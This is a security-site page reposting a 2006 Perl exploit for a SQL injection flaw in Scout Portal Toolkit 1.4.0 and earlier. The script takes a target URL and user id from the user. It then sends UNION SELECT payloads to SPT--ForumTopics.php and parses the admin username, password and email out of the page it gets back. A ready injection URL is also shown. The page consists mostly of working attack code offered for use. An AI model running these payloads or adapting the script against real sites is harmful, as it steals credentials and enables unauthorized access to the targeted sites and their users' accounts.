首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
来源:Moroccan Security Research Team 作者:Simo64 发布时间:2006-06-29  

#!/usr/bin/perl
#===============================================================
# Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit
# Coded By Simo64
# Moroccan Security Research Team
# Specials thx to :Greetz :

# CiM-Team - CrAsH_oVeR_rIdE - dabdoub - damip - DarkbiteX - drackanz - Iss4m - megamati
# Mourad - Preddy -Rachid - RapYaS - r00tkita - S4mi - secteura - Silitix - tahati - And All Freinds !
#===============================================================

# Details :
# Scout Portal Toolkit 1.4.0 Remote SQL injection Vulnerability
# Website : http://scout.wisc.edu/Projects/SPT/
# Vulnerable File : SPT--ForumTopics.php

# PoC : http://host/path/SPT--ForumTopics.php?forumid=[SQL]
# Exemple :
# This will display admin name and password
# Exploit : http://victime/path/SPT--ForumTopics.php?forumid=-9+UNION+SELECT+null,UserName,UserPassword,33,44,55+FROM+APUsers+WHERE+UserId=1
# The exploit will work regardless of magic_quotes_gpc is set or not
#==============================================================


use LWP::Simple;

print "\n===============================================================";
print "\n= Scout Portal Toolkit <= 1.4.0 Remote SQL injection Exploit =";
print "\n= Discovred & Coded By Simo64 =";

print "\n= Moroccan Security Research Team =";
print "\n===============================================================\n\n";

my($targ,$path,$userid,$xpl,$xpl2,$data,$data2,$email);

print "Enter Traget Exemple: http://site.com/ \nTraget : ";
chomp($targ = <STDIN>);
print "\n\nEnter Path TO Portal exemple: /SPT/ OR just / \nPath : ";

chomp($path=<STDIN>);
print "\n\nEnter userid Exemple: 1\nUserID : ";
chomp($userid=<STDIN>);

$xpl1="-9+UNION+SELECT+null,UserName,UserPassword,null,null,null+FROM+APUsers+WHERE+UserId=";

$xpl2="-9+UNION+SELECT+null,Email,null,null,null,null+FROM+APUsers+WHERE+UserId=";
print "\n[+] Connecting to: $targ\n";
$data = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl1.$userid) || die "\n[+]Connexion Failed!\n";

$data2 = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl2.$userid) || die "\n[+]Connexion Failed!\n";
print "\n[+] Connected !\n";
print "[+] Sending Data to $targ ....\n\n";


$username=substr($data,index($data,"<h1>")+11,index($data,"</h1>")-12);
chomp $username;

$password=substr($data,index($data,"</h1>")+34,index($data,"</p>")-index($data,"</h1>")-34);

chomp $password;

$email=substr($data2,index($data,"<h1>")+11,index($data2,"</h1>")-12);
chomp $email;

if(length($password) <= 34){
print "[!]Exploit Succeded !\n********************\n\n========= UserID = $userid Infos =======";

print "\n= UserID : ".$userid;
print "\n= Username : ".$username;
print "\n= Password : ".$password;
print "\n= Email : ".$email;
print "\n===================================\n\nEnjoy !";

}
else {print "\n[!] Exploit Failed !";}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft RRAS MSO6-025 Stack
·Microsoft Excel 2003 Hlink Sta
·Cesar FTP 0.99g MKD Command Bu
·BLOG:CMS <= 4.0.0k Remote S
·NIPrint LPD Request Overflow
·Mac OS X <= 10.4.6 (launchd
·DreamAccount <= 3.1 (auth.a
·GeekLog <= 1.4.0sr3 f(u)cke
·DeluxeBB <= 1.07 (cp.php) C
·Opera Web Browser 9.00 (iframe
·MyBulletinBoard (MyBB) <= 1
·Mac OS X <= 10.4.6 (launchd
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved